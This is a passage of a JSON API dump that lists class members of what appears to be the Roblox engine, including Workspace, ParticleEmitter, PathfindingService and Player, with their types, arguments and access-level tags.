ss":"Model"},{"ReturnType":"void","Arguments":[],"Name":"BreakJoints","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetExtentsSize","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetModelCFrame","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetModelSize","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetPrimaryPartCFrame","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"MakeJoints","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"MoveTo","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ResetOrientationToIdentity","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SetIdentityOrientation","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoordinateFrame","Name":"cframe","Default":null}],"Name":"SetPrimaryPartCFrame","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"delta","Default":null}],"Name":"TranslateBy","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"breakJoints","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"makeJoints","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"location","Default":null}],"Name":"move","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"location","Default":null}],"Name":"moveTo","tags":["deprecated"],"Class":"Model","type":"Function"},{"Superclass":"Model","type":"Class","Name":"RootInstance","tags":["notbrowsable"]},{"Superclass":"RootInstance","type":"Class","Name":"Workspace","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllowThirdPartySales","tags":[],"Class":"Workspace"},{"ValueType":"Object","type":"Property","Name":"CurrentCamera","tags":[],"Class":"Workspace"},{"ValueType":"double","type":"Property","Name":"DistributedGameTime","tags":[],"Class":"Workspace"},{"ValueType":"bool","type":"Property","Name":"FilteringEnabled","tags":[],"Class":"Workspace"},{"ValueType":"float","type":"Property","Name":"Gravity","tags":[],"Class":"Workspace"},{"ValueType":"bool","type":"Property","Name":"StreamingEnabled","tags":[],"Class":"Workspace"},{"ValueType":"Object","type":"Property","Name":"Terrain","tags":["readonly"],"Class":"Workspace"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"BreakJoints","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"ExperimentalSolverIsEnabled","tags":["LocalUserSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Ray","Name":"ray","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"bool","Name":"terrainCellsAreCubes","Default":"false"},{"Type":"bool","Name":"ignoreWater","Default":"false"}],"Name":"FindPartOnRay","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Ray","Name":"ray","Default":null},{"Type":"Objects","Name":"ignoreDescendentsTable","Default":null},{"Type":"bool","Name":"terrainCellsAreCubes","Default":"false"},{"Type":"bool","Name":"ignoreWater","Default":"false"}],"Name":"FindPartOnRayWithIgnoreList","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"int","Name":"maxParts","Default":"20"}],"Name":"FindPartsInRegion3","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Objects","Name":"ignoreDescendentsTable","Default":null},{"Type":"int","Name":"maxParts","Default":"20"}],"Name":"FindPartsInRegion3WithIgnoreList","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetNumAwakeParts","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetPhysicsAnalyzerBreakOnIssue","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"int","Name":"index","Default":null}],"Name":"GetPhysicsAnalyzerIssue","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetPhysicsThrottling","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRealPhysicsFPS","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"}],"Name":"IsRegion3Empty","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Objects","Name":"ignoreDescendentsTable","Default":null}],"Name":"IsRegion3EmptyWithIgnoreList","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null},{"Type":"JointCreationMode","Name":"jointType","Default":null}],"Name":"JoinToOutsiders","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"MakeJoints","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"PGSIsEnabled","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":null}],"Name":"SetPhysicsAnalyzerBreakOnIssue","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetPhysicsThrottleEnabled","tags":["LocalUserSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"UnjoinFromOutsiders","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ZoomToExtents","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Ray","Name":"ray","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"bool","Name":"terrainCellsAreCubes","Default":"false"},{"Type":"bool","Name":"ignoreWater","Default":"false"}],"Name":"findPartOnRay","tags":["deprecated"],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"int","Name":"maxParts","Default":"20"}],"Name":"findPartsInRegion3","tags":["deprecated"],"Class":"Workspace","type":"Function"},{"Arguments":[{"Name":"count","Type":"int"}],"Name":"PhysicsAnalyzerIssuesFound","tags":["PluginSecurity"],"Class":"Workspace","type":"Event"},{"Superclass":"Model","type":"Class","Name":"Status","tags":["deprecated","notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"Pages","tags":[]},{"ValueType":"bool","type":"Property","Name":"IsFinished","tags":["readonly"],"Class":"Pages"},{"ReturnType":"Array","Arguments":[],"Name":"GetCurrentPage","tags":[],"Class":"Pages","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"AdvanceToNextPageAsync","tags":[],"Class":"Pages","type":"YieldFunction"},{"Superclass":"Pages","type":"Class","Name":"DataStorePages","tags":[]},{"Superclass":"Pages","type":"Class","Name":"FriendPages","tags":[]},{"Superclass":"Pages","type":"Class","Name":"StandardPages","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PartOperationAsset","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ParticleEmitter","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Acceleration","tags":[],"Class":"ParticleEmitter"},{"ValueType":"ColorSequence","type":"Property","Name":"Color","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"Drag","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NormalId","type":"Property","Name":"EmissionDirection","tags":[],"Class":"ParticleEmitter"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"Lifetime","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"LightEmission","tags":[],"Class":"ParticleEmitter"},{"ValueType":"bool","type":"Property","Name":"LockedToPart","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"Rate","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"RotSpeed","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"Rotation","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberSequence","type":"Property","Name":"Size","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"Speed","tags":[],"Class":"ParticleEmitter"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberSequence","type":"Property","Name":"Transparency","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"VelocityInheritance","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"VelocitySpread","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"ZOffset","tags":[],"Class":"ParticleEmitter"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"particleCount","Default":"16"}],"Name":"Emit","tags":[],"Class":"ParticleEmitter","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Path","tags":[]},{"ValueType":"PathStatus","type":"Property","Name":"Status","tags":["readonly"],"Class":"Path"},{"ReturnType":"Array","Arguments":[],"Name":"GetPointCoordinates","tags":[],"Class":"Path","type":"Function"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"start","Default":null}],"Name":"CheckOcclusionAsync","tags":[],"Class":"Path","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"PathfindingService","tags":["notCreatable"]},{"ValueType":"float","type":"Property","Name":"EmptyCutoff","tags":[],"Class":"PathfindingService"},{"ReturnType":"Instance","Arguments":[{"Type":"Vector3","Name":"start","Default":null},{"Type":"Vector3","Name":"finish","Default":null},{"Type":"float","Name":"maxDistance","Default":null}],"Name":"ComputeRawPathAsync","tags":[],"Class":"PathfindingService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"Vector3","Name":"start","Default":null},{"Type":"Vector3","Name":"finish","Default":null},{"Type":"float","Name":"maxDistance","Default":null}],"Name":"ComputeSmoothPathAsync","tags":[],"Class":"PathfindingService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"PersonalServerService","tags":[]},{"ValueType":"string","type":"Property","Name":"RoleSets","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"Demote","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"Promote","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"personalServerGetRankUrl","Default":null}],"Name":"SetPersonalServerGetRankUrl","tags":["LocalUserSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"personalServerRoleSetsUrl","Default":null}],"Name":"SetPersonalServerRoleSetsUrl","tags":["LocalUserSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"personalServerSetRankUrl","Default":null}],"Name":"SetPersonalServerSetRankUrl","tags":["LocalUserSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"GetRoleSets","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"PhysicsPacketCache","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PhysicsService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PhysicsSettings","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllowSleep","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAnchorsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAssembliesShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAttachmentsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAwakePartsHighlighted","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreBodyTypesShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreConstraintsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreContactPointsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreJointCoordinatesShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreMechanismsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreModelCoordsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreOwnersShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"ArePartCoordsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreRegionsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreUnalignedPartsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreWorldCoordsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"IsReceiveAgeShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"IsTreeShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"ParallelPhysics","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"PhysicsAnalyzerEnabled","tags":["PluginSecurity","readonly"],"Class":"PhysicsSettings"},{"ValueType":"EnviromentalPhysicsThrottle","type":"Property","Name":"PhysicsEnvironmentalThrottle","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"ShowDecompositionGeometry","tags":[],"Class":"PhysicsSettings"},{"ValueType":"double","type":"Property","Name":"ThrottleAdjustTime","tags":[],"Class":"PhysicsSettings"},{"Superclass":"Instance","type":"Class","Name":"Player","tags":[]},{"ValueType":"int","type":"Property","Name":"AccountAge","tags":["readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"AppearanceDidLoad","tags":["RobloxScriptSecurity","deprecated","readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"AutoJumpEnabled","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"CameraMaxZoomDistance","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"CameraMinZoomDistance","tags":[],"Class":"Player"},{"ValueType":"CameraMode","type":"Property","Name":"CameraMode","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"CanLoadCharacterAppearance","tags":[],"Class":"Player"},{"ValueType":"Object","type":"Property","Name":"Character","tags":[],"Class":"Player"},{"ValueType":"string","type":"Property","Name":"CharacterAppearance","tags":["notbrowsable"],"Class":"Player"},{"ValueType":"ChatMode","type":"Property","Name":"ChatMode","tags":["RobloxScriptSecurity","readonly"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"DataComplexity","tags":["readonly"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"DataComplexityLimit","tags":["LocalUserSecurity"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"DataReady","tags":["readonly"],"Class":"Player"},{"ValueType":"DevCameraOcclusionMode","type":"Property","Name":"DevCameraOcclusionMode","tags":[],"Class":"Player"},{"ValueType":"DevComputerCameraMovementMode","type":"Property","Name":"DevComputerCameraMode","tags":[],"Class":"Player"},{"ValueType":"DevComputerMovementMode","type":"Property","Name":"DevComputerMovementMode","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"DevEnableMouseLock","tags":[],"Class":"Player"},{"ValueType":"DevTouchCameraMovementMode","type":"Property","Name":"DevTouchCameraMode","tags":[],"Class":"Player"},{"ValueType":"DevTouchMovementMode","type":"Property","Name":"DevTouchMovementMode","tags":[],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"FollowUserId","tags":["readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"Guest","tags":["RobloxScriptSecurity","readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"HasBuildTools","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"HealthDisplayDistance","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"MaximumSimulationRadius","tags":["LocalUserSecurity"],"Class":"Player"},{"ValueType":"MembershipType","type":"Property","Name":"MembershipType","tags":["readonly"],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"NameDisplayDistance","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"Neutral","tags":[],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"PersonalServerRank","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"Object","type":"Property","Name":"RespawnLocation","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"SimulationRadius","tags":["LocalUserSecurity"],"Class":"Player"},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"Teleported","tags":["RobloxScriptSecurity","hidden","readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"TeleportedIn","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"UserId","tags":[],"Class":"Player"},{"ValueType":"string","type":"Property","Name":"VRDevice","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"userId","tags":["deprecated"],"Class":"Player"},{"ReturnType":"void","Arguments":[],"Name":"ClearCharacterAppearance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"float","Arguments":[{"Type":"Vector3","Name":"point","Default":null}],"Name":"DistanceFromCharacter","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"FriendStatus","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"GetFriendStatus","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetGameSessionID","tags":["RobloxSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetMouse","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetUnder13","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"HasAppearanceLoaded","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"JumpCharacter","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Kick","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadBoolean","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"inGame","Default":"true"}],"Name":"LoadCharacter","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"assetInstance","Default":null}],"Name":"LoadCharacterAppearance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"LoadData","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadInstance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadNumber","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadString","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"walkDirection","Default":null},{"Type":"bool","Name":"relativeToCamera","Default":"false"}],"Name":"Move","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"walkDirection","Default":null},{"Type":"float","Name":"maxWalkDelta","Default":null}],"Name":"MoveCharacter","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RemoveCharacter","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"RequestFriendship","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"RevokeFriendship","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"bool","Name":"value","Default":null}],"Name":"SaveBoolean","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveData","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Instance","Name":"value","Default":null}],"Name":"SaveInstance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveLeaderboardData","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"double","Name":"value","Default":null}],"Name":"SaveNumber","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"string","Name":"value","Default":null}],"Name":"SaveString","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"accountAge","Default":null}],"Name":"SetAccountAge","tags":["PluginSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"MembershipType","Name":"membershipType","Default":null}],"Name":"SetMembershipType","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetSuperSafeChat","tags":["PluginSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetUnder13","tags":["RobloxSecurity","deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadBoolean","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadInstance","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadNumber","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadString","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"bool","Name":"value","Default":null}],"Name":"saveBoolean","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Instance","Name":"value","Default":null}],"Name":"saveInstance","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"double","Name":"value","Default":null}],"Name":"saveNumber","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"string","Name":"value","Default":null}],"Name":"saveString","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"maxFriends","Default":"200"}],"Name":"GetFriendsOnline","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetRankInGroup","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetRoleInGroup","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"string","Arguments":[],"Name":"GetWebPersonalServerRank","tags":["LocalUserSecurity","backend"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"IsBestFriendsWith","tags":["deprecated"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"IsFriendsWith","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"IsInGroup","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"rank","Default":null}],"Name":"SetWebPersonalServerRank","tags":["WritePlayerSecurity"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[],"Name":"WaitForDataReady","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"isFriendsWith","tags":["deprecated"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[],"Name":"waitForDataReady","tags":["deprecated"],"Class":"Player","type":"YieldFunction"},{"Arguments":[{"Name":"character","Type":"Instance"}],"Name":"CharacterAdded","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"character","Type":"Instance"}],"Name":"CharacterAppearanceLoaded","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"character","Type":"Instance"}],"Name":"CharacterRemoving","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"recipient","Type":"Instance"}],"Name":"Chatted","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"friendStatus","Type":"FriendStatus"}],"Name":"FriendStatusChanged","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"time","Type":"double"}],"Name":"Idled","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"teleportState","Type":"TeleportState"},{"Name":"placeId","Type":"int"},{"Name":"spawnName","Type":"string"}],"Name":"OnTeleport","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"radius","Type":"float"}],"Name":"SimulationRadiusChanged","tags":["LocalUserSecurity"],"Class":"Player","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"PlayerScripts","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"Players","tags":[]},{"ValueType":"bool","type":"Property","Name":"BubbleChat","tags":["readonly"],"Class":"Players"},{"ValueType":"bool","type":"Property","Name":"CharacterAutoLoads","tags":[],"Class":"Players"},{"ValueType":"bool","type":"Property","Name":"ClassicChat","tags":["readonly"],"Class":"Players"},{"ValueType":"Object","type":"Property","Name":"LocalPlayer","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"MaxPlayers","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"MaxPlayersInternal","tags":["LocalUserSecurity"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"NumPlayers","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"PreferredPlayers","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"PreferredPlayersInternal","tags":["LocalUserSecurity"],"Class":"Players"},{"ValueType":"Object","type":"Property","Name":"localPlayer","tags":["deprecated","hidden","readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"numPlayers","tags":["deprecated","hidden","readonly"],"Class":"Players"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"AddLeaderboardKey","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null}],"Name":"Chat","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"bool","Name":"isTeleport","Default":"false"}],"Name":"CreateLocalPlayer","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userID","Default":null}],"Name":"GetPlayerByID","tags":["LocalUserSecurity","deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPlayerById","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPlayerByUserId","tags":[],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"character","Default":null}],"Name":"GetPlayerFromCharacter","t